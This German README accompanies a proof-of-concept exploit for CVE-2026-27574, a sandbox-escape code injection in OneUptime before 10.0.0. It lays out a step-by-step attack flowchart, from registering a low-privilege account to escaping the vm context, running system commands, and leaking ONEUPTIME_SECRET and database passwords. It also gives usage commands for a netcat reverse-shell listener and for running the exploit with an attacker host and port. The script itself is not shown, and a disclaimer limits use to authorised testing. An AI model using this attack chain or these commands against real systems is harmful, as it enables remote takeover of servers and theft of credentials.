
Proof-of-Concept-Exploit für CVE-2026-27574, eine kritische Code-Injection in OneUptime, die Remote-Code-Ausführung und das Leaken von Umgebungsvariablen ermöglicht.
Proof-of-Concept-Exploit für CVE-2026-27574 – eine kritische Code-Injection-Schwachstelle (CWE-94) in OneUptime < 10.0.0, die die Ausführung beliebigen JavaScript-Codes im Probe-Kontext ermöglicht und zu vollständiger sowie zum Abfluss sensibler Umgebungsvariablen führt.
Behoben in: OneUptime 10.0.0 (Migration auf isolated-vm)
Exploit-Typ: Remote
Authentifizierung: Geringe Privilegien (jedes registrierte Projektmitglied)
Auswirkung: Vollständige Serverkompromittierung, Diebstahl von Anmeldedaten, Übernahme des Clusters
flowchart TD
A[Start] --> B[Open Registration]
B --> C[Register New Account]
C --> D[Create New Project]
D --> E[Obtain ProjectMember Role]
E --> F[Create Custom JavaScript Monitor]
F --> G[Inject Malicious vm Escape Payload]
G --> H[Probe Executes Code Every ~60s]
H --> I[Escape vm Context via constructor chain]
I --> J[Access process & child_process]
J --> K[Execute System Commands]
J --> L[Leak Environment Variables]
K --> M[Read /etc/passwd, id, hostname, etc.]
L --> N[Extract ONEUPTIME_SECRET, DB/Redis passwords, etc.]
M --> O[Full RCE Achieved]
N --> O
O --> P[Optional: Reverse Shell / Data Exfiltration]
P --> Q[End - System Compromised]# Listener starten (falls Reverse Shell verwendet wird)
nc -lvnp 4444
# Exploit ausführen
python3 exploit.py http://target:3002 --lhost YOUR_IP --lport 4444
requests-Bibliothek (pip install requests)Dieser Code dient ausschließlich Bildungszwecken und autorisierten Sicherheitstests.
Die unbefugte Verwendung gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Testgenehmigung haben, ist illegal und unethisch.
Entwickelt von Mohammed Idrees Banyamer • Jordanien • @banyamer_security